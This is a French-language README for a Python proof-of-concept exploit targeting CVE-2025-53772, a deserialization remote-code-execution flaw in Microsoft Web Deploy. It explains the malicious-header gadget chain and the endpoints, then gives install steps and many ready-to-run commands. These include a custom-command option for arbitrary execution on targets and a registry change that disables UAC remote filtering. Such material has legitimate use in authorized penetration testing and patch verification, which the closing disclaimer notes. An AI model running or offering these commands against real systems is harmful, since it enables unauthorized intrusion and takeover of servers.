
PoC pour CVE-2025-53772
Un exploit basé sur Python pour CVE-2025-53772, une vulnérabilité d'exécution de code à distance dans Microsoft Web Deploy (msdeploy) causée par une désérialisation non sécurisée des données d'en-tête HTTP.

| Propriété | Valeur |
|---|---|
| Identifiant CVE | CVE-2025-53772 |
| Score CVSS | 8.8 (Élevé) |
| Produit concerné | Microsoft Web Deploy 4.0 |
| Versions vulnérables | < 10.0.2001 |
| Version corrigée | 10.0.2001+ |
| Type de vulnérabilité | Désérialisation de données non fiables (CWE-502) |
| Authentification | Requise (privilèges faibles) |
La vulnérabilité réside dans la désérialisation de l'en-tête HTTP MSDeploy.SyncOptions. Lorsqu'un payload spécialement conçu est envoyé, le serveur le désérialise à l'aide de BinaryFormatter, déclenchant l'exécution de code arbitraire via la chaîne de gadgets TypeConfuseDelegate.
Attacker Target Server
│ │
│ POST /MSDEPLOYAGENTSERVICE HTTP/1.1 │
│ MSDeploy.SyncOptions: <malicious_payload> │
│─────────────────────────────────────────────>│
│ │
│ BinaryFormatter.Deserialize()
│ │
│ ▼
│ Process.Start("cmd.exe", "/c ...")
│ │
│ ▼
│ RCE Achieved!
| Point de terminaison | Port | Protocole | Type d'authentification |
|---|---|---|---|
/MSDEPLOYAGENTSERVICE | 80 | HTTP | NTLM |
/msdeploy.axd | 8172 | HTTPS | Basic |
git clone https://github.com/sailay1996/CVE-2025-53772.git
cd CVE-2025-53772
pip install -r requirements.txt
requests>=2.28.0
urllib3>=1.26.0
requests-ntlm>=1.2.0
# Create proof file in C:\Windows\Temp\pwned.txt
python3 CVE-2025-53772.py -t <TARGET_IP> -u "<DOMAIN\username>" -P "<password>" --ntlm --proof-temp
-t, --target Target IP or hostname (required)
-u, --user Username (required)
-P, --password Password (required)
--port Target port (default: 80)
--endpoint Endpoint path (default: /MSDEPLOYAGENTSERVICE)
--ntlm Use NTLM authentication (required for Agent Service)
--calc Execute calc.exe
--proof-temp Create C:\Windows\Temp\pwned.txt
--proof-web Create C:\inetpub\wwwroot\pwned.txt
-c, --command Custom command to execute
--generate-only Only generate payload, don't send
-o, --output Save payload to file
# Pop calculator
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\Administrator" -P "P@ssw0rd" --ntlm --calc
# Create proof file in temp folder
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\webdeploy" -P "Password123" --ntlm --proof-temp
# Create proof file in webroot (verify via browser)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm --proof-web
# Execute custom command
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm -c "whoami > C:\Windows\Temp\whoami.txt"
# Generate payload only (don't send)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "test" -P "test" --generate-only --proof-temp -o payload.txt
# Using msdeploy.axd endpoint (no --ntlm flag)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "webdeploy" -P "Password123" --port 8172 --endpoint "/msdeploy.axd" --proof-temp
Après avoir exécuté l'exploit, vérifiez son exécution sur la cible :
# Check for proof file
type C:\Windows\Temp\pwned.txt
# Or via browser (if --proof-web was used)
# Navigate to: http://<TARGET>/pwned.txt
Si vous utilisez le service Agent avec NTLM et obtenez une erreur 401 :
# On target, disable UAC remote filtering:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Le gestionnaire IIS n'est peut-être pas enregistré. Utilisez plutôt le point de terminaison du service Agent :
--port 80 --endpoint "/MSDEPLOYAGENTSERVICE"
# Check installed version
(Get-Command msdeploy.exe).FileVersionInfo.FileVersion
# Vulnerable if < 10.0.2001
Cet outil est fourni uniquement à des fins de tests de sécurité autorisés et d'éducation. L'accès non autorisé à des systèmes informatiques est illégal. Obtenez toujours une autorisation appropriée avant de tester.
Licence MIT